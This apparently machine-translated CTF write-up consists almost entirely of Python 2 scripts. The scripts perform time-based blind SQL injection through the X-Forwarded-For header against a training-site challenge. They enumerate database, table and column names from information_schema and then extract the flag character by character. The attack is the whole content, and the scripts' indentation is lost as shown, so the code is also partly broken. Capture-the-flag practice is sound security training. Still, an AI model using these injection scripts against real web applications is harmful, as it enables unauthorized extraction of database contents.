Violently ask for the database name:
# -*- coding:utf-8 -*-
import requests
import string
url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"
guess = string.lowercase+string.uppercase+string.digits+string.punctuation
database=[]
for database_number in range(0,100): #Assume the first 100 libraries to be blasted
databasename=''
for i in range(1,100): #Blast the length of the string, assuming no more than 100 lengths
flag=0
for str in guess: #Blast the character at this position
#print 'trying ',str
headers = {"X-forwarded-for":"'+"+" (select case when (substring((select schema_name from information_schema.SCHEMATA limit 1 offset %d) from %d for 1)='%s') then sleep(5) else 1 end) and '1'='1"%(database_number,i,str)}
try:
res=requests.get(url,headers=headers,timeout=4)
except:
databasename+=str
flag=1
print 'Scanning the %d database name, the databasename now is '%(database_number+1) ,databasename
break
if flag==0:
break
database.append(databasename)
if i==1 and flag==0:
print 'Scan complete'
break
for i in range(len(database)):
print database[i]
Violence seeks the number of data tables:
# -*- coding:utf-8 -*-
import requests
import string
url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"
guess = string.lowercase+string.uppercase+string.digits+string.punctuation
for table_number in range(0,500):
print 'trying',table_number
headers = {"X-forwarded-for":"'+"+" (select case when (select count(table_name) from information_schema.TABLES ) ='%d' then sleep(5) else 1 end) and '1'='1"%(table_number)}
try:
res=requests.get(url,headers=headers,timeout=4)
except:
print table_number
breakViolence for table name:
# -*- coding:utf-8 -*-
import requests
import string
url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"
guess = string.lowercase+string.uppercase+string.digits+string.punctuation
tables=[]
for table_number in range(41,42): #Assume from the 60th
tablename=''
for i in range(1,100): #Blast the length of the string, assuming no more than 100 lengths
flag=0
for str in guess: #Blast the character at this position
headers = {"X-forwarded-for":"'+"+" (select case when (substring((select table_name from information_schema.TABLES limit 1 offset %d) from %d for 1)='%s') then sleep(5) else 1 end) and '1'='1"%(table_number,i,str)}
try:
res=requests.get(url,headers=headers,timeout=4)
except:
tablename+=str
flag=1
print 'Scanning the %d database name, the tablename now is '%(table_number+1) ,tablename
break
if flag==0:
break
tables.append(tablename)
if i==1 and flag==0:
print 'Scan complete'
break
for i in range(len(tables)):
print tables[i]
Violently find the number of columns:
# -*- coding:utf-8 -*-
import requests
import string
url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"
guess = string.lowercase+string.uppercase+string.digits+string.punctuation
database=[]
for table_number in range(0,1000):
print 'trying',table_number
headers = {"X-forwarded-for":"'+"+" (select case when (select count(COLUMN_name) from information_schema.COLUMNS ) ='%d' then sleep(5) else 1 end) and '1'='1"%(table_number)}
try:
res=requests.get(url,headers=headers,timeout=4)
except:
print table_number
break
Violence seeks listing:
# -*- coding:utf-8 -*-
import requests
import string
url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"
guess = string.lowercase+string.uppercase+string.digits+string.punctuation
columns=[]
for column_number in range(482,483): #假设从第60个开始
cloumnname=''
for i in range(1,100): #爆破字符串长度,假设不超过100长度
flag=0
for str in guess: #爆破该位置的字符
#print 'trying',str
headers = {"X-forwarded-for":"'+"+" (select case when (substring((select COLUMN_name from information_schema.COLUMNS limit 1 offset %d) from %d for 1)='%s') then sleep(5) else 1 end) and '1'='1"%(column_number,i,str)}
try:
res=requests.get(url,headers=headers,timeout=4)
except:
cloumnname+=str
flag=1
print '正在扫描第%d个列名,the cloumnname now is '%(column_number+1) ,cloumnname
break
if flag==0:
break
columns.append(cloumnname)
if i==1 and flag==0:
print '扫描完成'
break
for i in range(len(columns)):
print columns[i]Violence seeks content:
#-*-coding:utf-8-*-
import requests
import string
url="http://ctf5.shiyanbar.com/web/wonderkun/index.php"
guess=string.lowercase + string.uppercase + string.digits
flag=""
for i in range(1,100):
havenry = 0
for str in guess:
headers={"x-forwarded-for":"' +(select case when (substring((select flag from flag ) from %d for 1 )='%s') then sleep(7) else 1 end ) and '1'='1" %(i,str)}
try:
res=requests.get(url,headers=headers,timeout=6)
except requests.exceptions.ReadTimeout, e:
havenry = 1
flag = flag + str
print "flag:", flag
break
if havenry == 0:
break
print 'result:' + flag
If you submit, submit the content in ctf{}.